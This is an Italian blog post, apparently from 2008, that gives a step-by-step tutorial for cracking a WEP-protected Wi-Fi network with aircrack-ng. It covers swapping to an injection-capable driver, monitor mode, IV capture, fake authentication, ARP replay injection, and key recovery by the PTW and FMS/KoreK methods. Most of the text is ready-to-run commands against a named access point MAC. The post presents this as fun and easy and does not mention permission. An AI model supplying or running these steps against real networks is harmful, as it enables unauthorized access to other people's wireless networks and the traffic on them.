Posted by myr | Posted in Sitting-room | Posted on 24-07-2008
eheheh è divertente e facilissimo!
ecco come, usando aircrack-ng (è in apt quindi lo installate facilmente se avete debian o ubuntu).
raccogliete queste info preventivamente:
- vostro MAC address (sudo ifconfig, guardate in corrispondenza dell’interfaccia wireless che dovrebbe essere tipo wlan0, affianco ad “HWaddr”)
- MAC address dell’Access Point + numero del canale (sudo iwlist scan, avrete un elenco di reti wireless disponibili del tipo:
Cell 01 - Address: 00:0F:B5:B5:1E:B4
ESSID:”NETGEAR”
Mode:Master
Channel:11
Frequency:2.462 GHz (Channel 11)
Quality=62/100 Signal level=-70 dBm Noise level=-91 dBm
Encryption key:on
Bit Rates:1 Mb/s; 2 Mb/s; 5.5 Mb/s; 11 Mb/s; 22 Mb/s
6 Mb/s; 9 Mb/s; 12 Mb/s; 18 Mb/s; 24 Mb/s
36 Mb/s; 48 Mb/s; 54 Mb/s
Extra:tsf=00000025576f5949
^^in cui come vedete tra le altre cose, c’è il MAC address dell’Access Point e il numero del canale)
DOPO
innanzitutto dovete usare driver per la scheda di rete wireless che permettano l’injection. Potete assicurarvene con questo test.
se avete il driver iwl3945 come me (scheda di rete Intel Corporation PRO/Wireless 3945ABG Network Connection), non permette l’injection e allora dovete sostituirlo con un altro, così:
installate ipwraw, e poi eseguite:
modprobe -r iwl3945
modprobe -r mac80211
modprobe ipwraw
sleep 1
poi impostate e avviate le nuove interfacce di rete così (per impostare il Mode: Monitor; infatti se dopo lanciate sudo iwconfig comparirà wifi0 Mode: Monitor):
iwconfig wifi0 rate 1M
iwconfig wifi0 txpower 16
airmon-ng start wifi0
airmon-ng start rtap0
1 catturare i vettori di inizializzazione:
sudo airodump-ng -c 11 –bssid 00:0F:B5:B5:1E:B4 -w output wifi0
dove -c indica il canale; –bssid indica il MAC dell’AP; -w prefisso del nome del file che conterrà i vettori di inizializzazione; wifi0 è il nome dell’interfaccia di rete wireless
2 associo il mio MAC all’AP in modo che mi autentichi; tramite una fake authentication:
aireplay-ng -1 0 -e NETGEAR -a 00:0F:B5:B5:1E:B4 -h 00:1b:77:19:4c:a3 wifi0
dove -1 indica che l’autenticazione è fake; 0 sono i secondi tra una riassociazione e l’altra; -e è l’essID della rete di interesse; -a è il MAC dell’AP, -h è il MAC mio
3 Ascolto le ARP requests, perchè l’AP generalmente le redistribuisce in broadcast e genera un nuovo vettore di inizializzazione: noi vogliamo ottenere quanti più vettori di inizializzazione possibile.
aireplay-ng -3 -b 00:0F:B5:B5:1E:B4 -h 00:1b:77:19:4c:a3 wifi0
4 Trovo la chiave WEP.
Ci sono due metodi:
il metodo PTW
aircrack-ng -z -b 00:0F:B5:B5:1E:B4 output*.cap
dove -z invoca il PTW metodo di cracking di chiavi WEP; mentre output*.cap seleziona tutti i file che cominciano per output e finiscono con .cap (il resto l’ho già spiegato prima)
e il metodo FMS/KOREK
aircrack-ng -b 00:0F:B5:B5:1E:B4 output*.cap
con uno di questi due metodi si trova la WEP key!
ecco uno screenshot XD:
P.S.
non ho alcuna presunzione sull’argomento…l’ho anche scritto che era il mio “primo” wep-crack.
se ho scritto delle boiate Dho (probabilissimo XD )prego qualche buon’anima di correggermi
